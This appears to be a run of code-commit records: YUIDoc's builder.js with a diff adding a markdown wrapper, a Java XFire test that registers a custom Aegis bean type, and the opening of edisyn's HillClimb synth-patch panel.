Y.Files.writeFile(path.join(self.options.outdir, 'json', 'index.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'index.html'), html, stack.add(noop)); })); stack.done(function(html, view) { Y.log('Writing index.html', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderModule: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); data.displayName = data.name; data.name = self.filterFileName(data.name); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta = Y.merge(opts.meta, data); //opts.meta.htmlTitle = v.name + ': ' + self.data.project.name; opts.meta.title = self.data.project.name; opts.meta.moduleName = data.displayName || data.name; opts.meta.moduleDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); if (data.classes && Object.keys(data.classes).length) { opts.meta.moduleClasses = []; Y.each(Object.keys(data.classes), function(name) { var i = self.data.classes[name]; if (i) { opts.meta.moduleClasses.push({ name: i.name, displayName: i.name }); } }); opts.meta.moduleClasses.sort(self.nameSort); } if (data.submodules && Object.keys(data.submodules).length) { opts.meta.subModules = []; Y.each(Object.keys(data.submodules), function(name) { var i = self.data.modules[name]; if (i) { opts.meta.subModules.push({ name: i.name, displayName: i.name, description: i.description }); } }); opts.meta.subModules.sort(self.nameSort); } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>module}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the module files under "out"/modules/ * @method writeModules * @param {Callback} cb The callback to execute after it's completed */ writeModules: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.modules).length + ' modules pages.', 'info', 'builder'); Y.each(self.data.modules, function(v) { if (v.external) { return } self.renderModule(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'module_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'modules', v.name + '.html'), html, stack.add(noop)); }, v, layout); }); stack.done(function() { Y.log('Finished writing module files', 'info', 'builder'); cb(stack.html, stack.view); }); }, hasProperty: function(a, b) { var other; var h = Y.some(a, function(i, k) { if ((i.itemtype === b.itemtype) && (i.name === b.name)) { other = k; return true; } }); return other; }, mergeExtends: function(info, classItems) { var self = this; if (info.extends || info.uses) { var hasItems = {}; hasItems[info.extends] = 1; if (info.uses) { info.uses.forEach(function(v) { hasItems[v] = 1; }); } self.data.classitems.forEach(function(v) { //console.error(v.class, '==', info.extends); if (hasItems[v.class]) { if (!v.static) { var override = self.hasProperty(classItems, v); if (!override) { //This method was extended from the parent class but not over written //console.error('Merging extends from', v.class, 'onto', info.name); var q = Y.merge({}, v); q.extended_from = v.class; classItems.push(q); } else { //This method was extended from the parent and overwritten in this class var q = Y.merge({}, v); q = self.augmentData(q); classItems[override].overwritten_from = q; } } } }); if (self.data.classes[info.extends]) { if (self.data.classes[info.extends].extends || self.data.classes[info.extends].uses) { //console.error('Stepping down to:', self.data.classes[info.extends]); classItems = self.mergeExtends(self.data.classes[info.extends], classItems); } } } return classItems; }, renderClass: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { //console.log(opts); if (err) { console.log(err); } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.classDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.methods = []; opts.meta.properties = []; opts.meta.attrs = []; opts.meta.events = []; opts.meta.extension_for = null; if (data.uses) { opts.meta.uses = data.uses; } if (data.entension_for && data.extension_for.length) { opts.meta.extension_for = data.extension_for; } if (data.extends) { opts.meta.extends = data.extends; } var classItems = []; self.data.classitems.forEach(function(i) { if (i.class === data.name) { classItems.push(i); } }); classItems = self.mergeExtends(data, classItems); if (data.is_constructor) { var i = Y.mix({}, data); i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description)); i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } //console.error(i); opts.meta.is_constructor = [i]; } classItems.forEach(function(i) { switch (i.itemtype) { case 'method': i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description || '')); i.methodDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.methods.push(i); break; case 'property': i = self.augmentData(i); //i.propertyDescription = self._parseCode(markdown(i.description || '')); i.propertyDescription = self._parseCode(i.description); if (!i.type) { i.type = 'unknown'; } if (i.final === '') { i.final = true; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.properties.push(i); break; case 'attribute': // fallthru case 'config': i = self.augmentData(i); //i.attrDescription = self._parseCode(markdown(i.description || '')); i.attrDescription = self._parseCode(i.description); if (i.itemtype === 'config') { i.config = true; } else { i.emit = self.options.attributesEmit; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.attrs.push(i); break; case 'event': i = self.augmentData(i); //i.eventDescription = self._parseCode(markdown(i.description || '')); i.eventDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.events.push(i); break; } }); opts.meta.attrs.sort(self.nameSort); opts.meta.events.sort(self.nameSort); opts.meta.methods.sort(self.nameSort); opts.meta.properties.sort(self.nameSort); if (!opts.meta.methods.length) { delete opts.meta.methods; } if (!opts.meta.properties.length) { delete opts.meta.properties; } if (!opts.meta.attrs.length) { delete opts.meta.attrs; } if (!opts.meta.events.length) { delete opts.meta.events; } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>classes}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the class files under "out"/classes/ * @method writeClasses * @param {Callback} cb The callback to execute after it's completed */ writeClasses: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.classes).length + ' class pages.', 'info', 'builder'); Y.each(self.data.classes, function(v) { if (v.external) { return } self.renderClass(stack.add(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'classes_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'classes', v.name + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing class files', 'info', 'builder'); cb(stack.html, stack.view); }); }, /** * Sort method of array of objects with a property called __name__ * @method nameSort * @param {Object} a First object to compare * @param {Object} b Second object to compare * @return {Number} 1, -1 or 0 for sorting. */ nameSort: function(a, b) { if (!a.name || !b.name) { return 0; } var an = a.name.toLowerCase(), bn = b.name.toLowerCase(), ret = 0; if (an < bn) { ret = -1; } if (an > bn) { ret = 1 } return ret; }, /** * Generates the syntax files under `"out"/files/` * @method writeFiles * @param {Callback} cb The callback to execute after it's completed */ writeFiles: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.files).length + ' source files.', 'info', 'builder'); Y.each(self.data.files, function(v) { if (v.external) { return } self.renderFile(stack.add(function(html, view, data) { if (!view || !data) { return; } stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'files_' + self.filterFileName(data.name) + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'files', self.filterFileName(data.name) + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing source files', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderFile: function(cb, data, layout) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { if (err) { console.log(err); } if (!data.name) { return; } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.fileName = data.name; fs.readFile(opts.meta.fileName, 'utf8', Y.rbind(function(err, str, opts, data) { if (err) { Y.log(err, 'error', 'builder'); cb(err); return; } opts.meta.fileData = str; var view = new Y.DocView(opts.meta, 'index'); var mainLayout = opts.layouts[layout]; self.render('{{>files}}', view, mainLayout, opts.partials, function(err, html) { self.files++; cb(html, view, data); }); }, this, opts, data)); }); }, writeAPIMeta: function(cb) { Y.log('Writing API Meta Data', 'info', 'builder'); var self = this; this.renderAPIMeta(function(js) { fs.writeFile(path.join(self.options.outdir, 'api.js'), js, 'utf8', cb); }); }, renderAPIMeta: function(cb) { var opts = { meta: {} }, self = this; opts = this.populateClasses(opts); opts = this.populateModules(opts); ['classes', 'modules'].forEach(function(id) { opts.meta[id].forEach(function(v, k) { opts.meta[id][k] = v.name; if (v.submodules) { v.submodules.forEach(function(s) { opts.meta[id].push(s.displayName); }); } }); opts.meta[id].sort(); }); var apijs = 'YUI.add("yuidoc-meta", function(Y) {\n' + ' Y.YUIDoc = { meta: ' + JSON.stringify(opts.meta, null, 4) + ' };\n' + '});'; cb(apijs); }, /** * Normalizes a file path to a writable filename: * * var path = 'lib/file.js'; * returns 'lib_file.js'; * * @method filterFileName * @param {String} f The filename to normalize * @return {String} The filtered file path */ filterFileName: function(f) { return f.replace(/[\/\\]/g, '_'); }, /** * Compiles the templates from the meta-data provided by DocParser * @method compile * @param {Callback} cb The callback to execute after it's completed */ compile: function(cb) { var self = this; var starttime = (new Date()).getTime(); Y.log('Compiling Templates', 'info', 'builder'); this.mixExternal(function() { self.makeDirs(function() { Y.log('Copying Assets', 'info', 'builder'); if (!Y.Files.isDirectory(path.join(self.options.outdir, 'assets'))) { fs.mkdirSync(path.join(self.options.outdir, 'assets'), 0777); } Y.Files.copyAssets([path.join(DEFAULT_THEME, 'assets'), path.join(themeDir, 'assets')], path.join(self.options.outdir, 'assets'), false, function() { var cstack = new Y.Parallel(); self.writeModules(cstack.add(function() { self.writeClasses(cstack.add(function() { if (!self.options.nocode) { self.writeFiles(cstack.add(noop)); } })); })); self.writeIndex(cstack.add(noop)); self.writeAPIMeta(cstack.add(noop)); cstack.done(function() { var endtime = (new Date()).getTime(); var timer = ((endtime - starttime) / 1000) + ' seconds'; Y.log('Finished writing ' + self.files + ' files in ' + timer, 'info', 'builder'); if (cb) { cb(); } }); }); }); }); } } });
Added a factory for MD parsing to experiment with alternative parsers.
lib/builder.js
Added a factory for MD parsing to experiment with alternative parsers.
<ide><path>ib/builder.js <ide> Code licensed under the BSD License: <ide> http://yuilibrary.com/license/ <ide> */ <del>var markdown = require("node-markdown").Markdown, <add>var MD = require("node-markdown").Markdown, <ide> fs = require('graceful-fs'), <ide> noop = function() {}, <ide> path = require('path'), <ide> } <ide> <ide> return t; <add> }, <add> /** <add> * Wrapper around the Markdown parser so it can be normalized or even side stepped <add> * @method markdown <add> * @private <add> * @param {String} md The Markdown string to parse <add> * @param {Boolean} def Only allow default set of HTML tags <add> * @param {Array} tags An array of tags to allow <add> * @return {HTML} The rendered HTML <add> */ <add> markdown = function(md, def, tags) { <add> html = MD(md, def, tags); <add> return html; <ide> }; <ide> <ide> /**
Java
mit
error: pathspec 'xfire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java' did not match any file(s) known to git
dedb6f6a963f0ae5602acfc1ec928e28ad399d58
1
eduardodaluz/xfire,eduardodaluz/xfire
package org.codehaus.xfire.aegis.example; import javax.xml.namespace.QName; import org.codehaus.xfire.aegis.AbstractXFireAegisTest; import org.codehaus.xfire.aegis.AegisBindingProvider; import org.codehaus.xfire.aegis.type.TypeMapping; import org.codehaus.xfire.aegis.type.basic.BeanType; import org.codehaus.xfire.service.Service; import org.codehaus.xfire.service.binding.ObjectServiceFactory; import org.codehaus.xfire.services.BeanService; import org.codehaus.xfire.services.SimpleBean; import org.codehaus.xfire.soap.SoapConstants; import org.codehaus.xfire.wsdl.WSDLWriter; import org.jdom.Document; /** * @author <a href="mailto:[email protected]">peter royal</a> */ public class CustomTypeTest extends AbstractXFireAegisTest { public void testBeanService() throws Exception { // START SNIPPET: types ObjectServiceFactory osf = (ObjectServiceFactory) getServiceFactory(); AegisBindingProvider provider = (AegisBindingProvider) osf.getBindingProvider(); TypeMapping tm = provider.getTypeMappingRegistry().getDefaultTypeMapping(); // Create your custom type BeanType type = new BeanType(); type.setTypeClass(SimpleBean.class); type.setSchemaType(new QName("urn:ReallyNotSoSimpleBean", "SimpleBean")); // register the type tm.register(type); Service service = getServiceFactory().create(BeanService.class); getServiceRegistry().register(service); // END SNIPPET: types final Document response = invokeService("BeanService", "/org/codehaus/xfire/message/wrapped/WrappedCustomTypeTest.bean11.xml"); addNamespace("sb", "http://services.xfire.codehaus.org"); assertValid("/s:Envelope/s:Body/sb:getSubmitBeanResponse", response); assertValid("//sb:getSubmitBeanResponse/sb:out", response); assertValid("//sb:getSubmitBeanResponse/sb:out[text()=\"blah\"]", response); final Document doc = getWSDLDocument("BeanService"); addNamespace("wsdl", WSDLWriter.WSDL11_NS); addNamespace("wsdlsoap", WSDLWriter.WSDL11_SOAP_NS); addNamespace("xsd", SoapConstants.XSD); assertValid("/wsdl:definitions/wsdl:types", doc); assertValid("/wsdl:definitions/wsdl:types/xsd:schema", doc); assertValid("/wsdl:definitions/wsdl:types/xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']", doc); assertValid( "//xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']/xsd:element[@name='getSubmitBean']", doc); assertValid( "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in1'][@type='xsd:string']", doc); assertValid( "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in0'][@type='ns1:SimpleBean']", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"bleh\"]", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"howdy\"]", doc); assertValid("/wsdl:definitions/wsdl:types" + "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@type=\"xsd:string\"]", doc); assertValid( "/wsdl:definitions/wsdl:service/wsdl:port/wsdlsoap:address[@location='http://localhost/services/BeanService']", doc); } }
xfire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java
Show how to create a custom type git-svn-id: 9326b53cbc4a8f4c3d02979b62b178127d5150fe@952 c7d0bf07-ec0d-0410-b2cc-d48fa9be22ba
xfire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java
Show how to create a custom type
<ide><path>fire-aegis/src/test/org/codehaus/xfire/aegis/example/CustomTypeTest.java <add>package org.codehaus.xfire.aegis.example; <add> <add>import javax.xml.namespace.QName; <add> <add>import org.codehaus.xfire.aegis.AbstractXFireAegisTest; <add>import org.codehaus.xfire.aegis.AegisBindingProvider; <add>import org.codehaus.xfire.aegis.type.TypeMapping; <add>import org.codehaus.xfire.aegis.type.basic.BeanType; <add>import org.codehaus.xfire.service.Service; <add>import org.codehaus.xfire.service.binding.ObjectServiceFactory; <add>import org.codehaus.xfire.services.BeanService; <add>import org.codehaus.xfire.services.SimpleBean; <add>import org.codehaus.xfire.soap.SoapConstants; <add>import org.codehaus.xfire.wsdl.WSDLWriter; <add>import org.jdom.Document; <add> <add>/** <add> * @author <a href="mailto:[email protected]">peter royal</a> <add> */ <add>public class CustomTypeTest <add> extends AbstractXFireAegisTest <add>{ <add> public void testBeanService() <add> throws Exception <add> { <add> // START SNIPPET: types <add> ObjectServiceFactory osf = (ObjectServiceFactory) getServiceFactory(); <add> AegisBindingProvider provider = (AegisBindingProvider) osf.getBindingProvider(); <add> TypeMapping tm = provider.getTypeMappingRegistry().getDefaultTypeMapping(); <add> <add> // Create your custom type <add> BeanType type = new BeanType(); <add> type.setTypeClass(SimpleBean.class); <add> type.setSchemaType(new QName("urn:ReallyNotSoSimpleBean", "SimpleBean")); <add> <add> // register the type <add> tm.register(type); <add> <add> Service service = getServiceFactory().create(BeanService.class); <add> <add> getServiceRegistry().register(service); <add> <add> // END SNIPPET: types <add> <add> final Document response = <add> invokeService("BeanService", <add> "/org/codehaus/xfire/message/wrapped/WrappedCustomTypeTest.bean11.xml"); <add> <add> addNamespace("sb", "http://services.xfire.codehaus.org"); <add> assertValid("/s:Envelope/s:Body/sb:getSubmitBeanResponse", response); <add> assertValid("//sb:getSubmitBeanResponse/sb:out", response); <add> assertValid("//sb:getSubmitBeanResponse/sb:out[text()=\"blah\"]", response); <add> <add> final Document doc = getWSDLDocument("BeanService"); <add> <add> addNamespace("wsdl", WSDLWriter.WSDL11_NS); <add> addNamespace("wsdlsoap", WSDLWriter.WSDL11_SOAP_NS); <add> addNamespace("xsd", SoapConstants.XSD); <add> <add> assertValid("/wsdl:definitions/wsdl:types", doc); <add> assertValid("/wsdl:definitions/wsdl:types/xsd:schema", doc); <add> assertValid("/wsdl:definitions/wsdl:types/xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']", <add> doc); <add> assertValid( <add> "//xsd:schema[@targetNamespace='http://services.xfire.codehaus.org']/xsd:element[@name='getSubmitBean']", <add> doc); <add> assertValid( <add> "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in1'][@type='xsd:string']", <add> doc); <add> assertValid( <add> "//xsd:element[@name='getSubmitBean']/xsd:complexType/xsd:sequence/xsd:element[@name='in0'][@type='ns1:SimpleBean']", <add> doc); <add> <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"bleh\"]", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@name=\"howdy\"]", doc); <add> assertValid("/wsdl:definitions/wsdl:types" + <add> "/xsd:schema[@targetNamespace='urn:ReallyNotSoSimpleBean']" + <add> "/xsd:complexType[@name=\"SimpleBean\"]/xsd:sequence/xsd:element[@type=\"xsd:string\"]", doc); <add> <add> assertValid( <add> "/wsdl:definitions/wsdl:service/wsdl:port/wsdlsoap:address[@location='http://localhost/services/BeanService']", <add> doc); <add> } <add>}
Java
apache-2.0
9b039c39310adac65d2afe269dbf644ae7f97a2c
0
eclab/edisyn,eclab/edisyn,eclab/edisyn
/*** Copyright 2017 by Sean Luke Licensed under the Apache License version 2.0 */ package edisyn; import edisyn.synth.*; import edisyn.nn.*; import edisyn.gui.*; import javax.swing.*; import javax.swing.event.*; import javax.swing.border.*; import java.awt.*; import java.awt.event.*; import java.util.*; import java.io.*; /*** Procedure: Menu -> Start Hill-Climb [or Menu -> Reset Hill-Climb if already started] Creates Hill-Climb Panel and Resets it to current patch Menu -> Stop Hill-Climb Deletes Hill-Climb Panel Each sound has: 1. Done (or Keep?) -> Deletes Hill-Climb Panel and sets current patch to this sound [probably requires double-check dialog panel] 2. Try -> Sends sound to current patch 3. Best / Second Best / Third Best The Panel also has: 1. Iterate 2. Rate 3. Backup Hill-Climbing variations ***/ public class HillClimb extends SynthPanel { // OPERATIONS public static final int OPERATION_SEED_FROM_PATCH = 0; public static final int OPERATION_SEED_FROM_MORPH = 1; public static final int OPERATION_SEED_FROM_NUDGE = 2; public static final int OPERATION_SEED_FROM_FOUR = 3; public static final int OPERATION_SEED_FROM_SIX = 4; public static final int OPERATION_SEED_FROM_LIBRARIAN = 100; public static final int OPERATION_CLIMB = 4; public static final int OPERATION_CONSTRICT = 5; public static final int OPERATION_CLIMB_NN = 6; // HILL CLIMBING AND CONSTRICTION RATES // Note that the mutation rates go 0...100 inclusive, ints public static final int INITIAL_HILL_CLIMB_RATE = 37; // roughly 5 when we do weight^3 public static final int INITIAL_CONSTRICT_RATE = 0; // Note that the recombination rates go 0.0...1.0 inclusive, doubles public static final double CLIMB_RECOMBINATION_RATE = 0.75; public static final double CONSTRICT_RECOMBINATION_RATE = 0.75; /// HILL CLIMBING STACK class State { Model[] parents; int[] parentIndices; boolean[] parentsSelected; Model[] children; int operation; } // The stack proper ArrayList stack = new ArrayList(); /// NUMBER OF CANDIDATE SOLUTIONS public static final int NUM_CANDIDATES = 32; /// Candidates are divided into STAGES of 16 each. The mutation/recombionation procedures use the stage to determine how much mutation to do public static final int STAGE_SIZE = 16; // Size of the archive. We might make this bigger later. public static final int ARCHIVE_SIZE = 6; // There are more models than candidates: #17 is the current Model public static final int NUM_MODELS = NUM_CANDIDATES + ARCHIVE_SIZE + 1; // models currently being played and displayed Model[] currentModels = new Model[NUM_MODELS]; // the most recent procedure performed (see OPERATIONS above) int operation; // The ratings buttons, in the form ratings[candidate][rating] JRadioButton[][] ratings = new JRadioButton[NUM_MODELS + 1][3]; // The selection checkboxes, in the form selected[candidate]. Note that the only candidates are the actual candidates, not archives etc. JCheckBox[] selected = new JCheckBox[NUM_CANDIDATES]; // The play buttons, in the form plays[candidate] PushButton[] plays = new PushButton[NUM_MODELS]; // An empty synth used to store the hillclimbing and constriction model parameters, // since they can't be stored in the regular synth. Blank blank; // "Iteration 123" Category iterations; // Which sound is currently scheduled to be playing in the regular iteration int currentPlay = 0; // Which sound, if any, is currently playing because the user interrupted the regular iteration by pressing the sound's play button. // If no such sound, this is -1 int temporaryPlay = -1; // Climb button PushButton climb; // Constrict button. Notice that this is different from Climb PushButton constrict; // Climb mutation weights LabelledDial hillClimbRate; // Constriction mutation weights. Notice that this is different from Climb LabelledDial constrictRate; // Retry button PushButton retry; // Reset button PushButton reset; // Back button PushButton back; // Bigger checkbox JCheckBox bigger; // Box holding the hillcimber button and dial VBox hillClimbBox; // Box holding the constrictor button and dial VBox constrictBox; // Box holding either the hillClimbBox or the constrictBox. Needs to be occasionally revalidated. VBox outerBox; // List of climbing methods JComboBox method; // First 16 candidates VBox extraCandidates1; // Next 16 candidates VBox extraCandidates2; // holds either extraCandidates1 or extraCandidates1 + extraCandidates2 VBox candidates; boolean startSoundsAgain = false; public static final int NO_MENU_BUTTON = -1; int menuButton = NO_MENU_BUTTON; public void setToCurrentPatch() { if (menuButton != NO_MENU_BUTTON) { currentModels[menuButton] = synth.getModel().copy(); currentPlay = menuButton; menuButton = NO_MENU_BUTTON; if (startSoundsAgain) { synth.doSendTestNotes(); startSoundsAgain = false; } } } State popStack() { if (stack.size() == 0) return null; else return (State)(stack.remove(stack.size() - 1)); } void pushStack(int[] parentIndices, Model[] parents, boolean[] parentsSelected, Model[] children) { State state = new State(); state.parents = new Model[parents.length]; state.parentIndices = new int[parents.length]; state.parentsSelected = new boolean[parentsSelected.length]; state.operation = operation; for(int i = 0; i < parents.length; i++) { state.parents[i] = copy(parents[i]); state.parentIndices[i] = parentIndices[i]; state.parentsSelected[i] = parentsSelected[i]; } for(int i = 0; i < parentsSelected.length; i++) { state.parentsSelected[i] = parentsSelected[i]; } state.children = new Model[children.length]; for(int i = 0; i < children.length; i++) { state.children[i] = copy(children[i]); } stack.add(state); } State topStack() { if (stack.size() == 0) return null; else return (State)(stack.get(stack.size() - 1)); } boolean stackEmpty() { return (stack.size() == 0); } boolean stackInitial() { return (stack.size() == 1); } String titleForButton(int _i) { return "Play " + (_i < 16 ? (char)('a' + _i) : (_i < NUM_CANDIDATES ? (char)('A' + (_i - 16)) : (_i < NUM_MODELS - 1 ? (char)('q' + (_i - NUM_CANDIDATES)) : 'z'))); } VBox buildCandidate(int i) { final int _i = i; VBox vbox = new VBox(); plays[_i] = new PushButton(titleForButton(i)) { public void perform() { if (synth.isSendingTestNotes()) { temporaryPlay = _i; } else { for(int j = 0; j < NUM_MODELS; j++) { plays[j].getButton().setForeground(new JButton().getForeground()); plays[j].getButton().setText(titleForButton(j)); } plays[_i].getButton().setForeground(Color.RED); plays[_i].getButton().setText("<HTML><B>" + titleForButton(_i) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. Model backup = synth.model; synth.model = currentModels[_i]; synth.sendAllParameters(); synth.doSendTestNote(); synth.model = backup; temporaryPlay = _i; } } }; plays[i].getButton().setFocusable(false); vbox.add(plays[i]); HBox hh = new HBox(); VBox vv = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][0] = new JRadioButton("1")); ratings[i][0].setFocusable(false); ratings[i][0].setForeground(Style.TEXT_COLOR()); ratings[i][0].setFont(Style.SMALL_FONT()); ratings[i][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][0].setOpaque(false); // for windows vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][1] = new JRadioButton("2")); ratings[i][1].setFocusable(false); ratings[i][1].setForeground(Style.TEXT_COLOR()); ratings[i][1].setFont(Style.SMALL_FONT()); ratings[i][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][1].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[i][2] = new JRadioButton("3")); ratings[i][2].setFocusable(false); ratings[i][2].setForeground(Style.TEXT_COLOR()); ratings[i][2].setFont(Style.SMALL_FONT()); ratings[i][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[i][2].setOpaque(false); // for windows b.add(Box.createGlue()); vv.add(b); hh.add(vv); vv = new VBox(); if (i < NUM_CANDIDATES) { selected[i] = new JCheckBox(""); selected[i].setFocusable(false); selected[i].setForeground(Style.TEXT_COLOR()); selected[i].setOpaque(false); // for windows selected[i].setFont(Style.SMALL_FONT()); selected[i].setSelected(true); 